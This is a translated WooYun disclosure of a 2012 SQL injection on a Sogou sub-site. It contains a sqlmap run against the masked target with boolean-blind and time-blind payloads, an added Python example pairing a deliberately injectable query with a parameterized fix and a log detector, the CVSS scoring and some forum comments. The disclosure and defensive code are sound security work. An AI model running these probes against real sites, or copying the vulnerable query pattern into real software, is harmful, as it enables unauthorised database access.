SQL injection on a Sogou sub-site

Vulnerability summary

Defect ID: WooYun-2012-05719

Title: SQL injection on a Sogou sub-site

Vendor: Sogou (搜狗)

Author: Nu11

Submitted: 2012-04-04 08:04

Published: 2012-05-17 08:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Tags:

Vulnerability details

Disclosure timeline:

2012-04-04: Details reported to the vendor, awaiting vendor handling
2012-04-06: Vendor confirmed; details disclosed to the vendor only
2012-04-16: Details disclosed to core white hats and domain experts
2012-04-26: Details disclosed to regular white hats
2012-05-06: Details disclosed to trainee white hats
2012-05-17: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

A Sogou sub-site has a SQL injection flaw that could leak database contents.

Proof of vulnerability:

[email protected]:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://**.**.**.**/skins/xl.php?id=55"

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**

[*] starting at: 07:33:43

[07:33:44] [INFO] using '/pentest/web/scanners/sqlmap/output/**.**.**.**/session' as session file
[07:33:44] [INFO] testing connection to the target url
[07:33:46] [INFO] testing if the url is stable, wait a few seconds
[07:33:47] [INFO] url is stable
[07:33:47] [INFO] testing if GET parameter 'id' is dynamic
[07:33:48] [INFO] confirming that GET parameter 'id' is dynamic
[07:33:49] [INFO] GET parameter 'id' is dynamic
[07:33:51] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[07:33:51] [INFO] testing sql injection on GET parameter 'id'
[07:33:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:33:56] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[07:33:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:33:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:33:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[07:33:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:33:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:34:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[07:34:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[07:34:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[07:35:02] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[07:35:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:35:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=55 AND 9272=9272

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=55 AND SLEEP(5)
---
[07:36:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
[07:36:11] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/**.**.**.**'

[*] shutting down at: 07:36:11
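The sqlmap log above shows the two signals that made the id parameter exploitable: a tautology such as "AND 9272=9272" leaves the result unchanged while "AND 9272=9273" empties it (boolean-based blind), and "AND SLEEP(5)" delays the response (time-based blind). The page gives no fix, so the following is an added example, not code from the report or from Sogou, showing the defective query pattern next to its hardened form and reusing the same integer rule to flag such probes in an access log. The in-memory SQLite table, its column names, and the nginx-style log lines are constructed stand-ins; the real schema of /skins/xl.php is not on the page, and SQLite has no SLEEP(), so only the boolean probe is exercised against the database.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# A plain decimal integer is the only legitimate shape for a skin id.
ID_RE = re.compile(r"[0-9]{1,10}")


def build_db():
    """Constructed in-memory stand-in for the sub-site's skin table.

    The real schema is not on the page; table and column names are assumptions.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE skins (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO skins VALUES (?, ?)",
        [(54, "classic"), (55, "blue"), (56, "dark")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    """Defective pattern: the raw request value is spliced into the SQL text.

    Whatever follows the number becomes part of the WHERE clause, which is
    exactly what the boolean-based probe in the sqlmap log relies on.
    """
    sql = "SELECT name FROM skins WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def parse_id(raw_id):
    """Validate up front: accept only a plain decimal integer, else reject."""
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)


def lookup_parameterized(conn, skin_id):
    """Hardened form: a typed value bound to a placeholder is never parsed as SQL."""
    rows = conn.execute("SELECT name FROM skins WHERE id = ?", (skin_id,))
    return [row[0] for row in rows]


def flag_suspicious_requests(log_lines, param="id"):
    """Apply the same integer rule to access-log requests; return offending values."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)  # parse_qs also URL-decodes
        for value in query.get(param, []):
            if not ID_RE.fullmatch(value):
                hits.append(value)
    return hits


# Constructed nginx-style access log lines: the paths mirror the probes in the
# page's sqlmap output; client addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '10.0.0.1 - - [04/Apr/2012:07:33:44 +0800] "GET /skins/xl.php?id=55 HTTP/1.1" 200 512',
    '10.0.0.1 - - [04/Apr/2012:07:33:56 +0800] "GET /skins/xl.php?id=55%20AND%209272%3D9272 HTTP/1.1" 200 512',
    '10.0.0.1 - - [04/Apr/2012:07:35:02 +0800] "GET /skins/xl.php?id=55%20AND%20SLEEP%285%29 HTTP/1.1" 200 512',
    '10.0.0.2 - - [04/Apr/2012:07:36:00 +0800] "GET /index.php HTTP/1.1" 200 1024',
]


if __name__ == "__main__":
    db = build_db()
    # The true/false oracle: same row for the tautology, nothing for the false clause.
    print("vulnerable:", lookup_vulnerable(db, "55"),
          lookup_vulnerable(db, "55 AND 9272=9272"),
          lookup_vulnerable(db, "55 AND 9272=9273"))
    print("parameterized:", lookup_parameterized(db, parse_id("55")))
    print("flagged:", flag_suspicious_requests(SAMPLE_LOG))
```

The validation in parse_id is deliberately the same rule as the log check: once the handler only accepts what the detector accepts, any value the detector flags is also a request the application would have refused, so the log rule doubles as an audit of how the parameter was actually used before the fix.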

Remediation:

Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2012-04-06 16:40

Vendor reply:

CNVD confirmed the injection point and reproduced the process. CNVD has been in contact with the Sogou security team before and will coordinate the handling with them directly. The site is the affected organisation's input-method sub-site; in terms of impact it concerns only this one sub-site, and no further testing was performed. The vulnerability is scored as follows:
CVSS score: (AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:N) Score: 4.96 (out of a maximum of 10, medium severity)
That is: remotely exploitable, low attack complexity, no user authentication required, partial impact on confidentiality, no impact on integrity or availability. Technical difficulty factor: 1.0 (normal)
Impact factor: 1.1 (normal, sub-site system). Overall score: 4.96*1.0*1.1 = 5.456

Latest status:

None yet

Comments

  1. 2010-01-01 00:00 shine (White hat | Rank: 710 | Vulns: 75)

    A Sogou issue, and it got handed to CNVD?

  2. 2010-01-01 00:00 shine (White hat | Rank: 710 | Vulns: 75)

    Oh! Got it!

  3. 2010-01-01 00:00 horseluke (White hat | Rank: 108 | Vulns: 18)

    @shine I don't get it, I can't see why it had to go to CNCERT....

  4. 2010-01-01 00:00 shine (White hat | Rank: 710 | Vulns: 75)

    @horseluke It's one of the following possibilities:

    1. Sogou's "ignored" rate for vulnerabilities is too high and xsser can no longer communicate with that vendor (maybe there are some issues with this hole; this is the outcome of @xsser handling such incidents with full consideration (@xsser's emergency strategy)), so it could only go to CNCERT (CNCERT is the ultimate department responsible for vendors, i.e. the state);

    2. Sogou and CNCERT are in bed together;

    [email protected] (this is basically impossible, because even if it was a mix-up it could be changed back!)

    Guessing at other people's intentions is impolite! @xsser, don't take offence! Haha!